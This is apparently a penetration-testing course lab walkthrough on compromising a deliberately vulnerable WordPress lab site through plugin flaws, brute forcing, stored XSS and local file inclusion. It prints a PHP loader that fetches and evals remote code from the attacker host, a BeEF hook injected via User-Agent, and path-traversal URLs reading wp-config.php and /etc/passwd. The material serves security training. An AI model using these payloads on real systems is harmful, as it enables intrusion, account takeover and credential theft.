© 2019 Caendra, Inc. - Hera For Waptv3 - Exploiting Wordpress
© 2019 Caendra, Inc. - Hera For Waptv3 - Exploiting Wordpress
IMPORTANT:
Once you are connected to the VPN, you have to configure your hosts file to contain the
following entry:
Linux: /etc/hosts
172.16.37.11 fooblog.site
Windows: C:\windows\system32\drivers\etc\hosts
172.16.37.11 fooblog.site
You are now ready to open http://fooblog.site and access the lab!
The best tool is your brain. Then you may need some of:
Web Browser
Burp Suite
WPForce
BeEF
Wpscan
Custom/common web shells
A web server running on your attacker machine
Conduct enumeration on the WordPress and discover its users, plugins, and other information that
might be useful during the engagement using manual and automated methods. Utilize the tools covered
in the course to accomplish this task.
Gain access to the application through the use of brute force dictionary-based attacks.
Using vulnerabilities identified through the information gathering phase, we leverage a vulnerability in
the Image Gallery Plugin to obtain a shell on the web server.
Obtain a meterpreter shell on the target system using a vulnerability identified in the “Image Gallery
with Slideshow” plugin discovered during the enumeration phase.
In this scenario, we’ve identified that one of the plugins contains a Stored Cross-Site Scripting
vulnerability. This scenario also contains a WordPress administrator which is logging into the WordPress
site from a Windows machine and checking the vulnerable web page. We leverage This vulnerability to
obtain access to the administrators browser, and furthermore, use this vulnerability to add an
administrative user to the WordPress installation.
Exploit the stored XSS vulnerability within the “Broken Link Manager” plugin, obtain access to an
admin’s web browser on a second machine, and add an administrative user to the WordPress
installation using javascript exploit code.
- How to exploit a stored XSS vulnerability to compromise a WordPress site through a vulnerable
plugin.
- Use that exploit to add an admin user to the WordPress installation, using WPForce utilities.
Identify and exploit the LFI vulnerability in the affected plugin and use vulnerability to obtain credentials
to the database on the WordPress machine. Additionally, use information from the database to access a
second machine on the network, conduct information gathering, and get access to yet a third machine,
using the Windows 7 machine as a pivot.
Our initial task should be to browse to application. Using your browser, navigate to http://fooblog.site.
With WPScan (version 2.9.4), we can start to enumerate the various components of WordPress. Using
the following commands, we can start this process against our target system:
WPScan immediately identified the target WordPress version, a user account (admin), in addition to a
number of potential vulnerabilities in WordPress Core, and furthermore, has also identified
vulnerabilities in plugins via what is known as its passive detection mechanism.
Our second task, using WPScan is to do a more “active” detection of plugins. We’ll pass the “--
enumerate” parameter and the “p” value to attempt to enumerate more plugins:
The active scan, this time returns “7” plugins. Some of which were previously missed through our initial
WPScan scan.
1. Akismet (v4.0.3)
2. All-in-one-seo-pack (v2.5)
3. All-in-one-wp-migration (v6.68)
4. Simple-tags (v2.4.7)
5. Contact-form-manager (v1.4.1)
6. GigPress (v2.3.10)
7. Image-gallery-with-slideshow (v1.5)
Lastly, we’ll check the plugins directory again for any the tool may have missed, and we identify two
more, “broken-link-manager” and “multi-plugin-installer” that the tool initially missed, for a total of 9
plugins.
1. Akismet (v4.0.3)
2. All-in-one-seo-pack (v2.5)
3. All-in-one-wp-migration (v6.68)
4. Simple-tags (v2.4.7)
5. Contact-form-manager (v1.4.1)
6. GigPress (v2.3.10)
7. Image-gallery-with-slideshow (v1.5)
8. Broken-link-manager (v0.5.5)
9. Multi Plugin Installer (v1.1.0)
This gives us a great starting point in regard to determining potential exploitation vectors.
Of course, in addition to the plugins, we’ve also determined that the WordPress installation is running a
very outdated version (4.7), and quite possibly will lead to our initial compromise of the application. For
now, we’ll continue our information gathering phase.
Next, we determine users. We use WPScan once again, with the “--enumerate” parameter, but this time
with the “u” value:
Our user enumeration scan has determined 6 users, one of which is a “known” admin account.
Having discovered several usernames from our information gathering phase, we’ll use those to conduct
a brute force dictionary attack against the Administrative page of WordPress. The admin interface, as
we’ve learned can be usually found by browsing to the /wp-admin/ directory on a target WordPress
server, as we can see, in our case, the admin page is at the following URL:
Once we’ve identified the administrator login page, we can start our brute force attack. We’ll use a tool
known as “WPForce” for this, and which we also covered in the course material.
admin
ann
lane
patrick
stephen
frances
Next, we’ll use the WPForce script to run our attack, and we’ll choose the “rockyou.txt” wordlist which
can be found in the /usr/share/wordlists/ directory on Kali Linux. Keep in mind, that running a dictionary
attack using a large list like rockyou.txt can take a while especially considering the number of usernames
you might have discovered. It may be more time efficient to select a single user from the list, or try the
attack against just a couple of users at first. For this scenario, we’ve chosen to execute our bruteforce
attack against the “stephen” user.
We can use a command like the following to launch our brute force dictionary attack:
After several minutes, WPForce has found the password for the “stephen” account and has also
confirmed that “stephen” is also an admin of the WordPress site.
There are several paths we can take once we have administrative control over a WordPress site, ranging
from uploading a shell for access to the webserver, using the server as a pivot to other machines on the
internal network, etc. We’ll cover those as we move onto exploiting other vulnerabilities in the
application.
From our initial enumeration results, and after conducting research on the identified plugins and their
versions, we find that the Image Gallery plugin is a version which contains this vulnerability, version 1.5.
https://www.exploit-db.com/exploits/17761/
The affected URL on our WordPress installation can be found at the following:
http://www.fooblog.site/wp-content/plugins/image-gallery-with-slideshow/upload-file.php
We can easily exploit this issue for command execution on affected server by first creating a simple
proof-of-concept PHP script that will execute a command on the server. In this case, our file will contain
a “system()” php function, which we’ll use to call the “id” command on the webserver. We’ll call our file
“command.php” and should have the following contents:
Once our command.php file is created, we can see with PoC provided in the initial exploit finding, that
we can use a simple curl command to upload our file to the server:
The “-F” parameter in curl will send the appropriate “form” data (our command.php script in this case)
to the exposed “upload-file.php” script’s “uploadfile” parameter, which will result in our file being
uploaded to the machine.
Once we’ve run our command, our script can be found in the plugins’ “/wp-content/plugins/image-
gallery-with-slideshow/uploads/original” directory, as seen below.
Simply browsing to our script, confirms we have achieved some level of command execution on the web
server, by the output of the linux “id” command:
But why stop there? Let’s use this vulnerability to obtain a reverse shell back to our attacker system as
the web server user “daemon”.
The “web_delivery” module can be loaded in Metasploit with the following command:
Once loaded, we can view its options. We’ll need to define our “SRVHOST” value to be that of our tester
machine IP address.
The web_delivery module also contains several different “targets” we can use. We view the “targets” by
using the “show targets” command:
Next, we’ll set our payload to the “php/meterpreter/reverse_tcp” payload, and set our LHOST to be that
of our attacker system.
Running the “exploit” command, provides us with a “php” command we can run on the server.
Since we’re uploading the command in a PHP script and not running it directly on the target, we can
remove the “php -d allow_url_fopen=true -r” section, and simply create a script like the following:
<?php
eval(file_get_contents('http://172.16.37.5:8080/rxuLIi'));
?>
We then re-upload the file to the target system via the Image Gallery plugin exploit.
Our new shell will appear in the plugins’ uploads folder, as previously:
Clicking on our new shell, should trigger our php payload and give us a meterpreter session back on our
attacker system:
We can do some initial recon on our machine, and try and identify other hosts. First, we can run the
“ifconfig” command from the shell, and confirm our machine has a second interface with IP address
10.16.37.12.
Armed with this information, we can run the “arp -a” command to quickly identify other hosts on the
network:
We can see two additional IP addresses associated with the “ens34” network interface of the web
server, which appears to the internal network interface. This confirms a couple of other systems we
should make note of for later exploitation.
It should be noted, that due to its very nature, the “php” meterpreter payload is rather limited in
functionality, however, we can still use the meterpreter prompt to gather information about the system,
and we can still utilize some of metasploit’s “post” module to gather information. For instance, getting a
processing listing with the “ps” command from within the meterpreter shell:
meterpreter > ps
Process List
============
PID Name User Path
--- ---- ---- ----
1 /sbin/init root /sbin/init
2 [kthreadd] root [kthreadd]
3 [ksoftirqd/0] root [ksoftirqd/0]
5 [kworker/0:0H] root [kworker/0:0H]
6 [kworker/u2:0] root [kworker/u2:0]
7 [rcu_sched] root [rcu_sched]
We can also utilize post modules for gathering information, the “post/linux/gather/enum_configs”
module for instance, will gather all config files for later perusal.
In this scenario, we are tasked with exploiting a Stored Cross-Site scripting vulnerability in the “Broken
Links Manager” plugin, with the known assumption that an administrative user is logging onto the
WordPress site and checking the affected plugin’s admin pages. This should allow you to get a BeEF
hook on the administrator’s browser and should also allow us to use known tools or code to create an
arbitrary administrator user of the WordPress site.
In the above screenshot, we can see that requests for non-existent URL’s are saved in the plugin’s “LOG”
page, along with the Referer, and the visiting browsers User-Agent, which is also saved.
Referring to the research regarding the affected version of the Broken Link Manager plugin (v0.5.5),
shows that an unauthenticated attacker can exploit (modify) either the Referer or User-Agent header
fields and replace them with arbitrary javascript, which will then be executed in the browser context of
an administrator viewing the affected page.
This vulnerability occurs due to a lack filtering of user-supplied input (in this case, a user-agent or
referer) header.
First, we can launch BeEF from kali linux with the following command:
# beef-xss
[*] Please wait for the BeEF service to start.
[*] You might need to refresh your browser once it opens.
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
This will start up the BeEF panel and prepare the hook:
<script src="http://<tester_ip>:3000/hook.js"></script>
We’ll then use Burp Suite to modify our User-Agent header while requesting a non-existent URL. Our
initial request will be for http://fooblog.site/nonexistent.
We can then send the request to the “Repeater” function, where we’ll modify our User-Agent header to
be that of the BeEF hook:
To simulate the admin, open a new terminal and execute the below.
# rdesktop 172.16.37.15
You will be presented with the below login prompt. Click Log In.
Then, you will be automatically redirected to the Broken Link Manager’s logs.
If you don’t see something similar to the above, go back to Repeater and issue the request again.
Then, quickly go back to the Broken Links Manager’s logs and refresh the page. Do so, until you see a
“blank” field similar to the one depicted above.
BeEF’s UI should also contain the admin’s hooked browser, once you see that “blank” entry.
The “Create Pop Under” module can be found under the “Persistence” module tree.
Using this module will give us a bit more persistence during the admin’s session, and should appear as a
second hook in the BeEF interface:
Viewing the add_admin.js script, we ll need to modify several variables, the “url”, “login”, “pass” and
“email” variables as can be seen in the “add_admin.js” code below:
Once our script has been modified, from our attacker machine, we’ll serve it to the target via the XSS
vulnerability, and we can do so by launching a python SimpleHTTPServer on our attacker machine, in
this case, we’ll set it up on port 9999:
Once our web server is up and our add_admin.js script is in our webserver working directory, we can fire
another modified GET request to the target machine, but pointing to our add_admin.js script on our
attacker machine:
An admin user “hacker” must have now been added to the WordPress site.
And have full control over the WordPress site at this point:
First, our research points us to the following post about this particular plugin:
http://cinu.pl/research/wp-plugins/mail_2461e0b03bcce05cd091af609ce568b9.html
The above link states that the “mpi_download.php” file, part of the plugin’s functionality, is the source
of this vulnerability, so let’s have a look at some code:
In the above snippet of the “mpi_download.php” file, we can see that the “mpi_download_file()”
function does not contain any code that would sanitize or restrict the “file_path” variable from
accessing files on an arbitrary path. This means that we can submit a request like the following to access
the “wp-config.php” file, which contains information about the WordPress database on the target:
http://fooblog.site/wp-content/plugins/multi-plugin-
installer/mpi_download.php?filepath=../../../&filename=wp-config.php
http://www.fooblog.site/wp-content/plugins/multi-plugin-
installer/mpi_download.php?filepath=../../../&filename=../../../../../../etc/passwd
Since we’ve gotten credentials to the database, we’ll use that opportunity to see if we can access it
locally from our attacker machine. We can do this using the “mysql” client, and connecting to the
database as follows:
Being familiar with how to interact with certain databases through their native clients can come in
useful. For instance, we want to examine the “bitnami_wordpress” database, and to load it, we use the
following mysql query:
Furthermore, we can list all users and password hashes. We know the users live in the “wp_users”
table, so we can do that with the following command:
We can then use either hashcat or John The Ripper to attempt to crack any of the hashes, we do find,
we can successfully crack the password for “lane”, which is “ilovechris”, and we can do that using the
“rockyou.txt” wordlist:
Configure our RHOSTS, SMBUser and SMBPass options, and run the module:
Getting a shell on the machine is rather straightforward at this point, we can use the “psexec’ module,
and obtain a meterpreter shell on the Win7 host:
At this point, we’ve gone from exploiting a LFI vulnerability as an unauthenticated user on the
WordPress install, to extracting database users and password hashes directly from the database, to re-
use of credentials for full SYSTEM access to another host within the lab.